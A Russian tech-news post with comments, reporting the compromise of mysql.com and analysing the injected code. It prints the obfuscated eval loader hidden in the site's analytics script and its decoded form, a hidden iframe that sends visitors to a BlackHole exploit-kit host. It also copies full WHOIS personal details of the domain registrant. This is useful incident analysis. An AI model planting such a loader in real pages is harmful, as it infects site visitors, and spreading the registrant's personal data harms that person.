MySQL.com взломан и продан за 3000$

    Вся подробная информация будет под катом.


    Видео, демонстрирующее как пользователи заражаются:


    Шаг 1:

    Посещаем сайт mysql.com

    Шаг 2:

    Загружаем вредоносный скрипт: mysql.com/common/js/s_code_remote.js?ver=20091011

    /* SiteCatalyst code version: H.14. Copyright Omniture, Inc. More info available at http://www.omniture.com */
    /* Author: Neil Evans */
    /************************** CONFIG SECTION ****************************************/
    /* Specify the Report Suite(s) */
    Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,82/n,246/n,18/n,18/n,18/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,118/n,18/n,18/n,250/n,64/n,202/n,216/n,230/n,202/n,64/n,246/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,238/n,228/n,210/n,232/n,202/n,80/n,68/n,120/n,210/n,204/n,228/n,194/n,218/n,202/n,64/n,230/n,228/n,198/n,122/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,64/n,238/n,210/n,200/n,232/n,208/n,122/n,78/n,98/n,96/n,78/n,64/n,208/n,202/n,210/n,206/n,208/n,232/n,122/n,78/n,98/n,96/n,78/n,64/n,230/n,232/n,242/n,216/n,202/n,122/n,78/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,116/n,208/n,210/n,200/n,200/n,202/n,220/n,118/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,116/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,118/n,216/n,202/n,204/n,232/n,116/n,96/n,118/n,232/n,222/n,224/n,116/n,96/n,118/n,78/n,124/n,120/n,94/n,210/n,204/n,228/n,194/n,218/n,202/n,124/n,68/n,82/n,118/n,18/n,18/n,250/n,18/n,18/n,204/n,234/n,220/n,198/n,232/n,210/n,222/n,220/n,64/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,246/n,18/n,18/n,18/n,236/n,194/n,228/n,64/n,204/n,64/n,122/n,64/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,198/n,228/n,202/n,194/n,232/n,202/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,80/n,78/n,210/n,204/n,228/n,194/n,218/n,202/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,230/n,228/n,198/n,78/n,88/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,82/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,122/n,78/n,208/n,210/n,200/n,200/n,202/n,220/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,122/n,78/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,216/n,202/n,204/n,232/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,232/n,222/n,224/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,238/n,210/n,200/n,232/n,208/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,208/n,202/n,210/n,206/n,208/n,232/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,92/n,194/n,224/n,224/n,202/n,220/n,200/n,134/n,208/n,210/n,216/n,200/n,80/n,204/n,82/n,118/n,18/n,18/n,250/n];mm={}.qwe();for(i=0;i<m.length;i++)if({}.asd==='e')s+=mm(e("m"+"["+"i]"));e(s);
    
    var s_account="sunmysqldev";
    var sun_dynamicAccountSelection=true;
    var sun_dynamicAccountList="sunglobal,sunmysql=mysql.com;sunglobal,sunmysql=mysql.de;sunglobal,sunmysql=mysql.fr;sunglobal,sunmysql=mysql.it;sunmysqldev=.";
    /* Specify the Site ID */
    var s_siteid="mysql:";
    /* PageName Settings */
    if (typeof s_pageType=='undefined') {
    	var s_pageName=window.location.host+window.location.pathname;
    	s_pageName=s_pageName.replace(/www.mysql.com/,"");
    	s_pageName=s_pageName.replace(/www.mysql./,"");
    	s_pageName=s_pageName.replace(/.mysql.com/,":");
    	s_pageName=s_pageName.replace(/mysql.com/,"");
    }
    /* Remote Omniture JS call  */
    var sun_ssl=(window.location.protocol.toLowerCase().indexOf("https")!=-1);
    	if(sun_ssl == true) { var fullURL = "https://www.sun.com/share/metrics/metrics_group1.js"; }
    		else { var fullURL= "http://www-cdn.sun.com/share/metrics/metrics_group1.js"; }
    document.write("<sc" + "ript type=\"text/javascript\" src=\""+fullURL+"\"></sc" + "ript>");
    /************************** END CONFIG SECTION **************************************/
    /* Split dev.mysql.com Path  */
    var mysql_host=location.hostname;
    if (mysql_host=='dev.mysql.com') {
    	var mysql_url=window.location.pathname.toLowerCase();
    	var mysql_split=mysql_url.split("/");
    }
    /* Reset PageName Settings  */
    function s_postPlugins(s) {
    /* dev.mysql.com/doc ---> prop31  */
    if (mysql_host=='dev.mysql.com') {
    	if (mysql_split[1]=="doc") {
    		s.prop31=s.pageName;
    		s.pageName=s.channel+" (site section)";
    		}
    	}
    /* lists.mysql.com ---> prop31  */
    	if (mysql_host=='lists.mysql.com') {
    		s.prop31=s.pageName;
    		s.pageName=s.channel+" (site section)";
    	}
    }


    Декодированный скрипт выглядит следующим образом:
    image

    Ну и текстом:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://falosfax.in/info/in.cgi?5' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://falosfax.in/info/in.cgi?5');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);


    Скрипт генерирует ифрейм и редиректит нас на falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/, а отсюда на truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

    Здесь присутствует вредоносная связка BlackHole. Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.), и после успешной эксплуатации устанавливает вредоносную программу на ОС без ведома пользователя. Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.

    В настоящее время 4 из 44 антивирусов на VirusTotal могут обнаружить эту вредоносную программу:
    image

    Данные доменов:
    falosfax.inAddress: 212.95.63.201
    Location: Germany / Berlin
    Created On:20-Jun-2011 13:17:05 UTC
    Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
    Registrant Name:CHRISTOPHER J KLEIN
    Registrant Street1:7880 SW 132 STREET
    Registrant City:MIAMI
    Registrant State/Province:Florida
    Registrant Postal Code:33156
    Registrant Country:US
    Registrant Phone:+1.3053771635
    Registrant Email:cjklein54@yahoo.com
    Admin ID:TS_14483505
    Admin Name:CHRISTOPHER J KLEIN
    Admin Organization:N/A
    Admin Street1:7880 SW 132 STREET
    Admin Street2:
    Admin Street3:
    Admin City:MIAMI
    Admin State/Province:Florida
    Admin Postal Code:33156
    Admin Country:US
    Admin Phone:+1.3053771635
    Admin Phone Ext.:
    Admin FAX:
    Admin FAX Ext.:
    Admin Email:cjklein54@yahoo.com
    Tech Email:cjklein54@yahoo.com
    Name Server:NS1.SKYNS1.NET
    Name Server:NS2.SKYNS1.NET


    truruhfhqnviaosdpruejeslsuy.cx.cc
    Address: 46.16.233.108
    Location: Sweden / Stockholm


    Brian Krebs в своем блоге отметил, что недавно видел как на русском хакерском форуме продавали полный доступ к домену mysql.com и ко всем поддоменам за 3000$.
    image

    Похожие публикации

    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 105

      +28
      Серьёзно… В Oracle переполошились, наверное.

      Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.


      Windows? Иль что-то еще может быть поражено?
        +3
        Показательно. На фоне выигрыша в суде против корпорации добра… Гугл давно переманивает специалистов по ИБ в свою армию
          +3
          Сурьёзно заминусовали. И хоть бы написали что…
            –4
            >Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.
              +7
              Она эксплуатирует браузер, плагины, такие как Adobe Flash, Adobe PDF, Java и т.д.), и после успешной эксплуатации устанавливает вредоносную программу на ОС без ведома пользователя.

              Я понял, что она использует. То бишь Вы хотите сказать, что все-равно какая ОС? Хорошая такая универсальненькая вредоносная программа, ага.
                +16
                Кроссплатформенная такая, на java написана:-)
                  –3
                  Вот вы сами и ответили :)
                    +1
                    Кроссплатформенная-то пусть, но просто не думаю, что она запросто поставится в любую систему.
                    • НЛО прилетело и опубликовало эту надпись здесь
                        +1
                        А вы небось уже забыли как недавно пробегал троянец, который эксплуатируя дырку в Java умудрился установиться и работать даже в Linux? И единственное, что не делало заражение постоянным,— отсутствие кода, который добавлял бы его в автозапуск. Хотя написать такой код ни чего не мешало. Работал этот гад с правами пользователя и мог делать с профилем пользователя всё, что душе угодно. Авторы просто даже и не задумывались о линуксе, как о целевой системе для заражения.

                        Лично у меня Java-плагин давно отключен от греха подальше и включаю только если иначе никак.
                      0
                      Вчера заходил через Safari на Mac, вроде ничего не случилось, полет нормальный.
                0
                Что делать-то в итоге?
                  +76
                  паниковать
                    0
                    А какие варианты?
                      0
                      А какие есть?
                        +2
                        1. Делать.
                        2. Не делать.
                          +24
                          да
                            +8
                            ok
                              0
                              нет.
                                +5
                                '1064 — You have an error in your SQL syntax'
                                  +1
                                  тогда уж ORA 600 :)
                    +2
                    > Brian Krebs в своем блоге отметил, что недавно видел как на русском хакерском форуме продавали полный

                    Собственно ссылка на сам форум: exploit.in/forum/index.php?showtopic=52306
                      +2
                        –3
                        А вот этот чел купил судя по всему forum.antichat.ru/showthread.php?t=291761
                          0
                          Скрины с PuTTY под виндой. Не труЪ хакер :)
                            0
                            Расскажи в чём разница для хакера, виндов или линукс?
                            Т.е. хеккеры с виндой, это школьники.
                            А хеккеры под иксами, это тру?
                            Интересны Ваши аргументы :)
                          0
                          Вот ему русские покоя не дают (=
                          0
                          Опять наши отличились?
                          Надеюсь, это не происки гугла.
                            +14
                            Гугл слишком добр для таких шагов.
                              +1
                              Ждем когда подтянутся anonymous'ы и запасаемся попкорном :)
                            0
                            интересно бы увидеть лица постоянных пользователей сайта при очередном посещении :)
                            • НЛО прилетело и опубликовало эту надпись здесь
                                +2
                                Он пакер распознал.
                                • НЛО прилетело и опубликовало эту надпись здесь
                                +2
                                Судя по наличию вредоноса, его таки продали. Неужели такая сделка окупается? Ведь вредонос на сайте провисит максимум несколько часов. Может быть ктонибудь более просвещенный чем я, пояснит как монетизируется подобный рутовый доступ?
                                  0
                                  Чисто профанское предположение — быстрое создание относительно небольшого ботнета со всеми вытекающими.
                                    +9
                                    389818 юзеров в день на скриншоте с продажей указано.
                                    Это 16 тысяч юзеров в час. И заходят туда не порнуху покачать, а серьезные дядьки, порой с рабочих ПК, порой с мощных ПК, с жирным интернетом…
                                      +1
                                      С доступом со своего компа к своим проектам, исходникам, новым разработкам и т.п…
                                        +5
                                        Ну если так, то только успевай харды подставлять для слива инфы.
                                    0
                                    Окупается, если все сделать как надо, но в данном случаи кто-то просто выбросил 3000$ просто так, хотя может и сам продавец повесил BlackHole и решил таким образом подзаработать, не продуманный был шаг, да и писать подобные вещи о продаже вовсе не надо было, по крайней мере в паблике.
                                    –4
                                    Я правильно понимаю, что при правильно настроенных NoScript и RequestPolicy надо минимум десять раз щёлкнуть мышкой, чтобы появился сгенерированный iframe, загрузку которого надо будет тоже руками подтвердить?
                                    Тогда моя паранойя спокойна.
                                    Интересно увидеть статистику сколько человек (из посетителей mysql.com) загружает все скрипты в автоматическом режиме и разрешают iframe'ы.
                                      +5
                                      Обновите хром)
                                      P.S. да я не могу жить когда обновление загружено и не установлено
                                        –1
                                        Великая сила автоапдейтера хрома.
                                        +22
                                        Все хватит так дальше нельзя…
                                        Выключил Flash, PDF, Java плагины
                                        Поставил RequestPolicy и NoScript
                                        Одел каску спрятался в окопу с винтовкой
                                          +22
                                          Шапочку из фольги поверх каски одеть не забудьте!
                                            +5
                                            А што, сама каска не экранирует? =-О
                                              +5
                                              Уже доказали-же, что шапочка из фольги не помогает: berkeley.intel-research.net/arahimi/helmet/
                                                +2
                                                потому что надо заземлять :)
                                              +1
                                              вам действительно комфортно серфить, когда все работает не так как задумано и каждый раз приходится включать разрешение в noscript?
                                              как по мне достаточно java отключить… а остальное это паранойя
                                                +2
                                                И это сказали в топике где подробно рассказывается как зловред проникает через Adobe Flash, Adobe PDF. Да, точно только паранойя.
                                                </sarcasm>
                                                  +1
                                                  just use linux
                                                  Я заходил последние дни почти каждый день и ничего не заразился и никаких malware нет, так что без сарказма эта уязвимость именно связана с java. Вы видео то смотрели? windows, java и exe… Так что да для меня это выглядит паранойей
                                                    0
                                                    Ну во-первых большинство юзает далеко не Linux. И во-вторых именно по этому на Linux'е относительно безопасно, а не потому что он такой замечательный. Просто он пока никому не нужен. Сам я тоже юзаю Linux, и тоже часто пренебрегаю безопасностью, но это не повод призывать к этому других людей и обзывать их параноиками.
                                                      0
                                                      Безопасных вещей вообще в мире нет. Но я говорю именно о получении файла с http и запуске приложения без ведома пользователя. А в это linux на порядок лучше windows потому что такие элементарные вещи как права работают с коробки, если вы использовали например arch linux (не коробочные типа ubuntu) то вы должны знать что без выдачи прав пользователю он даже звук не может регулировать. А сидеть под рутом на десктопе никто не будет. Поэтому популярность системы тут не причем, на линуксе большинство сервером мира, вы хотите сказать что это не популярная система или может все таки не в популярности дело?
                                                        0
                                                        Для того чтобы получить доступ к пользовательским данным рута не нужно. Нужно как раз того самого пользователя. Соглашусь что в Linux в отличии от Win есть все средства чтобы этот доступ ограничить (SELinux и иже), но много кто тратит на их настройку время?
                                                      +1
                                                      Вы на 100% уверены, что не заразились?
                                                        0
                                                        Слежу за процессами почти каждый день, знаю что за что отвечает. Так что да на 99,9.
                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                      +1
                                                      java ≠ javascript
                                                        0
                                                        Однаков witdex предложил отключить именно джаву.
                                                        0
                                                        В жаве есть дыры, которые избавляют от подобных сообщений. А права у жавы ого-го! Особенно если она сама себя не контролирует.
                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                            0
                                                            Вы это троянам сообщите, которые периодически через жаву прорываются. :)
                                                            По поводу дыры, мне Secunia говорит для моей версии вот это. Естественно, можно обновиться, я не спорю, но раз эта версия почему-то у меня стоит, значит что-то не то у меня с обновлялкой Java.
                                                            • НЛО прилетело и опубликовало эту надпись здесь
                                                                0
                                                                Я привёл эту дырку как пример, там на секунии целый список этих дырок, и у меня есть подозрение, что присутствуют и более серьёзные, которые и в браузере работают. Т.к. у многих ещё java 1.5, да и 1.6 имеет кучу версий, вполне может быть и соответствующая дыра.
                                                                Вообще, как-то разбирали один дроппер, там в результате поочерёдно проверялись: Java, Flash, PDF и в зависимости от подходящих версий скидывался нужный эксплоит.
                                                          0
                                                          Я за много лет всего пару раз встречал предложение запустить апплет,… java не мейстримная вещь в вебе вообще, так что есть она или нет я это замечал, чтоб не соврать, раз 10 в жизни. И то на сайтах посвященных javafx и т.п.
                                                            0
                                                            а в чем проблема сейчас подписать код? сертификаты уходят пачками, это раз

                                                            а уязвимости в java сейчас на первом месте, это два

                                                            именно поэтому яву и надо отключать
                                                        0
                                                        Похоже, что проблему поправили.
                                                        В s_code_remote.js уже нет указанных манипуляций.
                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                            +2
                                                            Скорее всего не кламав справился, а от него просто не прятали малвару (проигнорировали детект упаковщика), т.к. на windows платформах он не очень распостранен.
                                                            Обычно малвару прячут от наиболее популярных антивирусных продуктов.
                                                              0
                                                              Я вот тоже пошел смотреть список. Потыкался, но так и не понял как получить такой же список.
                                                                0
                                                                Забыл указать ссылку на виртотал.
                                                                  –3
                                                                  Ого, TrendMicro. Он у меня с Асусом шел на мелком ноуте и был выпилен сразу же. Оказывается зря. С другой стороны, поймал неизвестную зверушку, а известную может и съесть. Ни один антивирь не дает надежной защиты. Тока не надо холиворов :) За ссылку спасибо.
                                                                +1
                                                                Русские молодцы!
                                                                  +7
                                                                  Угу, гордость прям распирает.
                                                                    +36
                                                                    Надо выпить водки!
                                                                      0
                                                                      А разве это плохо, что они нашли уязвимость? Конечно нехорошо то, что доступ к сайту был продан на черном рынке.
                                                                        +4
                                                                        Капитан, Вы ли?
                                                                        +4
                                                                        Ага, и еще с медведями по улице походить.
                                                                          +4
                                                                          И накормить медведя.
                                                                            +5
                                                                            И сиграть на балалайке.
                                                                              +12
                                                                              — Дорогая, я дома!
                                                                              — Почему так поздно?
                                                                              — По дороге медведь ногу вывихнул — пришлось водкой отпаивать.
                                                                              — Садитесь все! Давайте выпьем водки.
                                                                              — Мам, я пойду поиграю с медведем?
                                                                              — Хорошо, только сначала выпей водки.
                                                                              — А где наш дедушка?
                                                                              — Он вторую неделю стоит в очереди за талонами на талоны.
                                                                              — Хорошо, что он перед этим выпил водки.
                                                                              — И ты без дела не сиди — иди тоже выпей водки.
                                                                              — Ладно, иди, погуляй, сынок. И не забудь написать вечером отчёт в КГБ! А по пути домой не забудь купить водки — она заканчивается!
                                                                              — Дорогая, что-то жарко. Выключи, пожалуйста, атомный реактор.
                                                                              — Сейчас, водку допью и выключу, а ты пока сыграй гимн на балалайке!
                                                                              ©
                                                                          +4
                                                                          Да уж… Fedora 11 на продакшинах это нечто…
                                                                            +1
                                                                            У нашего мин.образования шестерочка все еще трудится.
                                                                            +16
                                                                            Посещаем сайт mysql.com

                                                                            Пользователю достаточно посетить mysql.com с уязвимой платформы и он заразится вредоносной программой.

                                                                            Вот спасибо так спасибо!
                                                                              +2
                                                                              кому теперь верить? надо пересаживаться на lynx…
                                                                                –2
                                                                                на IE 1.0
                                                                                0
                                                                                wget и текстовый редактор
                                                                                  +2
                                                                                  ворлд вайд веб по-столлмановски ;)
                                                                                    0
                                                                                    Telnet. Я же не браузер смотрю, а интернет!
                                                                                      +1
                                                                                      Зачем редактор, wget | less
                                                                                        0
                                                                                        я когда пугаюсь но хочется глянуть так и делаю…
                                                                                      +4
                                                                                      «MySQL.com продан за 3000$» — желтуха.
                                                                                        0
                                                                                        У меня вчера похожей яваскрипт бякой WordPress заболел.
                                                                                          –5
                                                                                          Насколько я понял, вся уязвимость заключается в кривом скрипте от омнитюры. Другой вопрос, откуда они этот скрипт взяли. Если кто-то ламанул омнитюру — это уже очень интерессно.
                                                                                            0
                                                                                            Заинтересовал сайт, где было размещено объявление. Я так понимаю там аккаунты раздают только «для своих»?
                                                                                              +10
                                                                                              Толпа хабраюзеров, которые по репорту вирустотала делают вывод какой АВ лучше — суицидируйте, срочно.
                                                                                                +2
                                                                                                Не знаю что и написать вдобавок к своему нику…
                                                                                                0
                                                                                                Всем виндузятником совет один — не сидите под админом (если ХП), и выключите javascript в Adobe Асrobat.
                                                                                                Тогда количество заражений уменьшится в 10 раз.
                                                                                                  0
                                                                                                  Вместо толстого акробата часто достаточно чего-то более легкого типа FoxitReader. Да и как-то ни разу не встречал JS в PDF, только вот, о нецелевом использовании и слышу ((
                                                                                                    +1
                                                                                                    Foxit Reader, полагаю, дырявее Adobe Reader'а на несколько порядков, учитывая что писали его самые типичные китайцы (хорошо если несколько). Просто пока он мало кому интересен, ввиду существенно меньшей распространённости.
                                                                                                    0
                                                                                                    не сидите под админом (если ХП), и выключите javascript в Adobe Асrobat

                                                                                                    Как будто PDF'ы эксплойтят Adobe Reader сугубо через JavaScript…
                                                                                                      0
                                                                                                      А где вы прочитали про то, что PDF'ы эксплойтят Adobe Reader сугубо через JavaScript?
                                                                                                      0
                                                                                                      В таком случае, для максимальной безопасности, рекомендую инструкции по настройке безопасности Adobe Reader.

                                                                                                    Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                                                    Самое читаемое